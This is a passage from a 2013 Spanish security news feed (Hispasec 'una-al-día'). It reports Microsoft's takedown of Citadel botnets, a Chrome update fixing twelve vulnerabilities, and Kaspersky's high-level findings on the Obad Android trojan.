&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Antonio Sánchez&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:asanchez@hispasec.com"&gt;asanchez@hispasec.com&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/Nh5eEWF58a0" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/Nh5eEWF58a0/wireshark-vuelve-corregir-10.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-_pbGYj3BybI/TxRpOA1s6WI/AAAAAAAAANU/uTQnaqV7NxE/s72-c/logo_wireshark.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/wireshark-vuelve-corregir-10.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-3891385596919076765</guid><pubDate>Thu, 13 Jun 2013 08:34:00 +0000</pubDate><atom:updated>2013-06-13T13:32:34.280+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">virus</category><category domain="http://www.blogger.com/atom/ns#">Malware</category><category domain="http://www.blogger.com/atom/ns#">Citadel</category><category domain="http://www.blogger.com/atom/ns#">Troyanos</category><category domain="http://www.blogger.com/atom/ns#">Microsoft</category><title>Microsoft desactiva 1.462 botnets Citadel</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.microsoft.com/en-us/news/Press/2013/Jun13/06-05DCUPR.aspx" style="font-size: 13pt;"&gt;Microsoft junto con autoridades, industria financiera e ISPs de varios países,&lt;/a&gt;&lt;span style="font-size: 13pt;"&gt; desactivaron el pasado día cinco de junio alrededor de &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;1.462 botnets utilizadas por Citadel&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt;. Las redes eran usadas para robar credenciales personales y bancarias de diversas entidades, y &lt;a href="http://blogs.technet.com/b/microsoft_blog/archive/2013/06/05/microsoft-works-with-financial-services-industry-leaders-law-enforcement-and-others-to-disrupt-massive-financial-cybercrime-ring.aspx"&gt;según Microsoft&lt;/a&gt;, &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;afectaban a cinco millones de personas&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt; &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;provocando más de medio millón de dólares en perdidas&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt;. Esta ha sido la séptima intervención de Microsoft contra una gran red zombi, que en la inmensa mayoría de los casos están compuestas por equipos Windows.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-C0BrA5zpaao/UbmtFBa3DNI/AAAAAAAACn0/mBamP8iSANs/s1600/Citadel_MS.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="212" src="http://1.bp.blogspot.com/-C0BrA5zpaao/UbmtFBa3DNI/AAAAAAAACn0/mBamP8iSANs/s320/Citadel_MS.jpg" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Microsoft y expertos forenses analizan evidencias &lt;br /&gt;
relacionadas con Citadel tras su detección en un &lt;br /&gt;
proveedor en New Jersey (Fuente:Microsoft)&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Citadel es un kit de malware, variante directa de Zeus, que funciona fundamentalmente de la misma manera. Se instala en el sistema y lo añade a una botnet, cuyos miembros reciben instrucciones desde un centro de control para realizar acciones ilegales distribuidas como el envío de spam además de (sobre todo) &lt;b&gt;inyectar código en las web bancarias legítimas para realizar transferencias no consentidas&lt;/b&gt;. Es una familia de malware muy utilizada a la hora de cometer fraude bancario.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
La operación de nombre clave b54, se llevó a cabo el pasado 5 de junio. En ella participaron, además de &lt;a href="http://www.microsoft.com/"&gt;Microsoft&lt;/a&gt;, &lt;st1:personname productid="la ABA" w:st="on"&gt;la &lt;a href="http://www.aba.com/"&gt;ABA&lt;/a&gt;&amp;nbsp;&lt;/st1:personname&gt;&lt;a href="http://www.aba.com/"&gt;(American Bankers Association) &lt;/a&gt;y &lt;a href="https://www.nacha.org/"&gt;NACHA (The Electronic Payments Association) &lt;/a&gt;entre otras asociaciones financieras y socios de Microsoft, junto al &lt;a href="http://www.fbi.gov/"&gt;FBI&lt;/a&gt;. La investigación data de principios de 2012, culminando hace dos semanas, cuando finalmente Microsoft abrió diligencias civiles contra las personas detrás de las botnets Citadel, a las que se refiere como John Does 1-82.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
El procedimiento ha sido &lt;a href="http://blogs.technet.com/b/microsoft_blog/archive/2013/02/22/bamital-botnet-takedown-is-successful-clean-up-underway.aspx"&gt;muy similar a la última intervención contra la botnet Bamital el pasado febrero&lt;/a&gt;. Tras la demanda civil, el juzgado del distrito oeste de Carolina del Norte autorizó al gigante de Redmond para cortar las comunicaciones de las máquinas infectadas con las 1.462 botnets que las controlaban. Para las infraestructuras fuera de los EEUU, Microsoft y el FBI se han puesto en contacto con los CERTs y autoridades de varios países para que lleven a cabo acciones similares.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Tras la actuación, &lt;b&gt;Microsoft utilizará la inteligencia recabada para alertar a los usuarios afectados de su infección.&lt;/b&gt; Usará para ello su programa Cyber Threat Intelligence Program. &lt;a href="http://www.microsoft.com/en-us/news/Press/2013/Jun13/06-05DCUPR.aspx"&gt;La nota de prensa no da muchos detalles técnicos&lt;/a&gt; de cómo se ha llevado a cabo la desactivación, pero los procedimientos anteriores indican que se han podido deshabilitar varias IPs pertenecientes a centros de control.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
De hecho se han confiscado datos y servidores de dos servicios de alojamiento de Pensilvania y Nueva Jersey. Sobre los dominios, normalmente se ponen bajo monitorización. Una búsqueda de dominios usados por Citadel en ZeusTracker nos arroja resultados curiosos:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-oFdqYZOhtDA/Ubmjh3TsOQI/AAAAAAAACnM/QxAV0-aGaPA/s1600/Citadel_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-oFdqYZOhtDA/Ubmjh3TsOQI/AAAAAAAACnM/QxAV0-aGaPA/s1600/Citadel_1.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Desde el pasado miércoles, muchos de ellos han sido desactivados, y otros siguen activos pero esta vez apuntando a IPs pertenecientes a Microsoft, que aparece como el mayor hospedador de sitios relacionados con estas botnets.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-6S3fr4typWQ/UbmkfqUD5SI/AAAAAAAACnc/z9WYiAVLfME/s1600/Citadel_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-6S3fr4typWQ/UbmkfqUD5SI/AAAAAAAACnc/z9WYiAVLfME/s1600/Citadel_2.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-ARKQDkviUmc/Ubmk-ABShqI/AAAAAAAACnk/WlOViTe0qtg/s1600/Citadel_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="201" src="http://4.bp.blogspot.com/-ARKQDkviUmc/Ubmk-ABShqI/AAAAAAAACnk/WlOViTe0qtg/s640/Citadel_3.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Esto se debe a que parte del procedimiento no consistía en desactivar los dominios sino en cambiar &lt;st1:personname productid="la IP" w:st="on"&gt;la IP&lt;/st1:personname&gt; donde apunta a los servidores de Microsoft y ceder el control del dominio a esta a través de un cambio en los servidores de nombres (NSX.MICROSOFTINTERNETSAFETY.NET). En otras ocasiones además se han dado instrucciones especificas de qué hacer con estos dominios, como mantenerlos activos pero no ponerlos a la venta, por tanto es de esperar que se haya actuado de la misma forma.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;La eficacia de estos movimientos&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Tras la operación, sin embargo, queda siempre la amarga sensación de que estas operaciones sirven para "&lt;i&gt;barrer el desierto&lt;/i&gt;". A corto plazo, el nivel desciende, pero la actividad y la producción es de tal calibre, que &lt;b&gt;a pesar de desactivar 1.400 botnets (lo que puede suponer una cantidad muy elevada de equipos infectados) no supone un gran golpe a la actividad general de este malware.&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
No es la primera vez que se dan estas grandes operaciones que acaban desarticulando redes zombi. &lt;a href="http://securityskeptic.typepad.com/the-security-skeptic/2012/04/microsoft-operation-b71-dismantling-the-zeus-botnet-family-domain-name-seizures.html"&gt;Microsoft ha participado en muchas "redadas" de este tipo&lt;/a&gt;, eliminando los servidores centrales que mantienen infectados a millones de ordenadores. Sin ir más lejos, &lt;a href="http://blogs.technet.com/b/microsoft_blog/archive/2012/03/25/microsoft-and-financial-services-industry-leaders-target-cybercriminal-operations-from-zeus-botnets.aspx"&gt;ya actuó contra las botnet Zeus en 2012, con bastante éxito&lt;/a&gt;... pero &lt;b&gt;su expansión ha continuado&lt;/b&gt;.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Más que el golpe técnico a las infraestructuras (con impacto limitado a largo plazo), lo positivo en este tipo de operaciones es comprobar que &lt;b&gt;la colaboración y coordinación entre las distintas partes parece fluida y fructífera, algo fundamental contra el crimen organizado&lt;/b&gt;.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;&lt;span lang="EN-GB"&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Microsoft, financial services and others join forces to combat massive cybercrime ring&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.microsoft.com/en-us/news/Press/2013/Jun13/06-05DCUPR.aspx"&gt;&lt;span lang="EN-GB"&gt;http://www.microsoft.com/en-us/news/Press/2013/Jun13/06-05DCUPR.aspx&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;Domain Name Seizures Prominent in Dismantling the ZeuS botnet&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://securityskeptic.typepad.com/the-security-skeptic/2012/04/microsoft-operation-b71-dismantling-the-zeus-botnet-family-domain-name-seizures.html"&gt;&lt;span lang="EN-GB"&gt;http://securityskeptic.typepad.com/the-security-skeptic/2012/04/microsoft-operation-b71-dismantling-the-zeus-botnet-family-domain-name-seizures.html&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;span lang="EN-GB"&gt;Francisco López&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:flopez@hispasec.com"&gt;&lt;span lang="EN-GB"&gt;flopez@hispasec.com&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/rYbU4Wq192I" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/rYbU4Wq192I/microsoft-desactiva-1462-botnets-citadel.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-C0BrA5zpaao/UbmtFBa3DNI/AAAAAAAACn0/mBamP8iSANs/s72-c/Citadel_MS.jpg" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/microsoft-desactiva-1462-botnets-citadel.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-4476394078444776221</guid><pubDate>Wed, 12 Jun 2013 15:58:00 +0000</pubDate><atom:updated>2013-06-12T20:24:47.191+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">Chrome</category><category domain="http://www.blogger.com/atom/ns#">Google</category><category domain="http://www.blogger.com/atom/ns#">navegador</category><title>Nueva versión de Google Chrome corrige 12 vulnerabilidades</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://googlechromereleases.blogspot.de/2013/06/stable-channel-update.html" style="font-size: 13pt;"&gt;Google ha publicado la versión 27.0.1453.110&lt;/a&gt;&lt;span style="font-size: 13pt;"&gt; de su navegador Chrome para todas las plataformas (Windows, Linux, Mac y Chrome Frame). Esta nueva versión corrige &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;doce vulnerabilidades&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt;, de las que diez han sido calificadas de importancia alta, y solo una como crítica.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-JSFeCs4x3mg/TuqhaA5c__I/AAAAAAAAAH0/cIDbFFrDNYg/s1600/chrome-logo.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-JSFeCs4x3mg/TuqhaA5c__I/AAAAAAAAAH0/cIDbFFrDNYg/s320/chrome-logo.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;La vulnerabilidad crítica se refiere a una corrupción de memoria en el manejo de sockets SSL&lt;/b&gt;, con identificador CVE-2013-2863, descubierta por Sebastien Marchand, de la comunidad de desarrolladores de Chromium.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Las de importancia alta se componen fundamentalmente de errores de uso de memoria previamente liberada, entre ellas en el manejo de audio en HTML5 (CVE-2013-2858), workers accediendo a APIs de bases de datos (CVE-2013-2860), datos de entrada (CVE-2013-2856), imágenes (CVE-2013-2857) y SVGs (CVE-2013-2861). Estas tres últimas han sido descubiertas por miaubiz, y que ha sido premiado con 3000 dólares en total. Entre las de importancia alta también está la mayor recompensa de esta actualización, que le reporta a Collin Payne 2000 dólares por una vulnerabilidad de un mal manejo pasado al renderizador que solo afecta a sistemas Windows, con identificador CVE-2013-2854.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
También se ha solucionado una vulnerabilidad de importancia media de corrupción de memoria en &lt;st1:personname productid="la API" w:st="on"&gt;la API&lt;/st1:personname&gt; de herramientas para desarrolladores, descubierta por daniel.zulla.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Además, el equipo de Chrome ha solucionado varios fallos de diversa consideración que se han encontrado en auditorías internas y otras iniciativas, reuniéndolos todos bajo el identificador CVE-2013-2865, con importancia alta.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Esta actualización está &lt;b&gt;disponible a través del propio navegador vía Chrome Update &lt;/b&gt;automáticamente o desde el sitio oficial de descarga:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://www.google.es/intl/es/chrome/"&gt;http://www.google.es/intl/es/chrome/&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Stable Channel Update&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://googlechromereleases.blogspot.de/2013/06/stable-channel-update.html"&gt;http://googlechromereleases.blogspot.de/2013/06/stable-channel-update.html&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;span lang="EN-GB"&gt;Francisco López&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:flopez@hispasec.com"&gt;&lt;span lang="EN-GB"&gt;flopez@hispasec.com&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/VzuXJxKZm7A" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/VzuXJxKZm7A/nueva-version-de-google-chrome-corrige.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-JSFeCs4x3mg/TuqhaA5c__I/AAAAAAAAAH0/cIDbFFrDNYg/s72-c/chrome-logo.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/nueva-version-de-google-chrome-corrige.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-8765353173873082608</guid><pubDate>Tue, 11 Jun 2013 12:02:00 +0000</pubDate><atom:updated>2013-06-12T08:18:33.419+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">virus</category><category domain="http://www.blogger.com/atom/ns#">Malware</category><category domain="http://www.blogger.com/atom/ns#">Kaspersky</category><category domain="http://www.blogger.com/atom/ns#">Android</category><title>Avanzado malware para Android aprovecha vulnerabilidades desconocidas</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-size: 13pt;"&gt;Kaspersky ha vuelto a encontrar un troyano de lo más sofisticado: aprovecha fallos desconocidos, actúa con sigilo, roba todo tipo de información... y está programado para Android. &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;Las características lo sitúan entre los más avanzados encontrados hasta la fecha para esta plataforma.&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-EWmD65wo81U/T7QquWn-AtI/AAAAAAAAAds/7PUlz-GyaSw/s1600/android-logo.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-EWmD65wo81U/T7QquWn-AtI/AAAAAAAAAds/7PUlz-GyaSw/s320/android-logo.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Android es la plataforma móvil contra la que se ha volcado el malware de forma masiva. Obvian los iPhone (por su política de firma de aplicaciones), Blackbery y Windows Phone. Los usuarios de Android son los que deben preocuparse por el malware en estos momentos por como ya se ha mencionado en una-al-día, es el líder indiscutible.&amp;nbsp; Este malware encontrado introduce novedades interesantes.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
El malware para Android se puede meter en cuatro grandes sacos: Principalmente los que utilizan los mensajes premium para monetizar rápidamente la infección. El sistema es infectado y permite el envío automático de mensajes a servicios premium SMS. Otra variante es el malware en Android como "&lt;i&gt;complemento&lt;/i&gt;" de los troyanos bancarios. Oras menos conocidas como las que, siguiendo los pasos del malware para escritorio, bloquean el teléfono buscando un rescate o que muestran publicidad. También existe el malware que inyecta publicidad en todas las aplicaciones... Y por último están las aplicaciones espía que permiten a un tercero obtener información del teléfono o de la actividad del usuario. Aquí es donde innova &lt;b&gt;Backdoor.AndroidOS.Obad&lt;/b&gt;, como lo han bautizado.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Ofuscación de código y aprovechamiento de vulnerabilidades&lt;/b&gt; &lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
El malware habitual para Windows utiliza todo tipo de trucos y astucias para evitar la ingeniería inversa. En Android esto no es tan habitual. Los investigadores utilizan DEX2JAR, que convierte los APK en ficheros JAR. Estos JAR, una vez descompilados, permiten una lectura limpia del código del malware y así entenderlo. Obad lo tiene en cuenta y actúa de forma que, &lt;b&gt;aprovechando un fallo en DEX2JAR, evita la conversión y dificulta su análisis.&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
También construye de manera especial el AndroidManifest.xml, fichero de configuración que acompaña a las aplicaciones y que, sin cumplir los estándares, es procesado por el sistema operativo. Por último aprovecha otro error del sistema, previamente desconocido, que permite a la aplicación tener los privilegios de "&lt;i&gt;Device Administrator&lt;/i&gt;" (más privilegios que el usuario normal que usa el teléfono) sin que aparezca en la lista de aplicaciones con esos privilegios. Esto, añadido a que corre totalmente en el "&lt;i&gt;background&lt;/i&gt;", impide acceder a ningún punto donde se pueda borrar la aplicación a nivel "normal". También intenta hacerse "&lt;i&gt;root&lt;/i&gt;" ejecutando el comando "&lt;i&gt;su id&lt;/i&gt;", y así también comprobar si el terminal está "&lt;i&gt;rooteado&lt;/i&gt;".&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Por último, &lt;b&gt;cifra y ofusca todos las URL de sus sistemas de control externos&lt;/b&gt; a los que envía y desde los que recibe información.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Qué hace&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Fundamentalmente, &lt;b&gt;robar información del teléfono&lt;/b&gt;. Pero sobre todo, lo interesante es saber qué instrucciones recibe de sus sistemas de control. Las más relevantes son:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Enviar mensajes SMS a números que se le pasan por parámetro y bloquear las respuestas.&lt;/li&gt;
&lt;li&gt;Recibir el saldo de la cuenta a través de USSD (Unstructured Supplementary Service Data).&lt;/li&gt;
&lt;li&gt;Actuar como proxy.&lt;/li&gt;
&lt;li&gt;Conectarse a diferentes direcciones (para actuar como clicker en anuncios, por ejemplos)&lt;/li&gt;
&lt;li&gt;Abrir una consola en el teléfono y ejecutar comandos.&lt;/li&gt;
&lt;li&gt;Enviar ficheros a los dispositivos Bluetooth alrededor.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Kaspersky también publica cómo se realiza la comunicación (a través de JSON, como viene siendo habitual) con los atacantes.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Como bien indican en la conclusión de su estudio, este malware se acerca en sus prácticas a lo que podría entenderse como comportamientos habituales del malware en el mundo Windows. Desde luego, ha ganado en sofisticación, pero también &lt;b&gt;resulta avanzado el uso de vulnerabilidades concretas previamente desconocidas para Android, &lt;/b&gt;algo poco habitual incluso para el malware en Windows.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;&lt;span lang="EN-GB"&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span lang="EN-GB"&gt;The most sophisticated Android Trojan&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://unaaldia.hispasec.com/2013/03/android-lider-indiscutible-del-malware.html"&gt;&lt;span lang="EN-GB"&gt;http://www.securelist.com/en/blog/8106/The_most_sophisticated_Android_Trojan&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
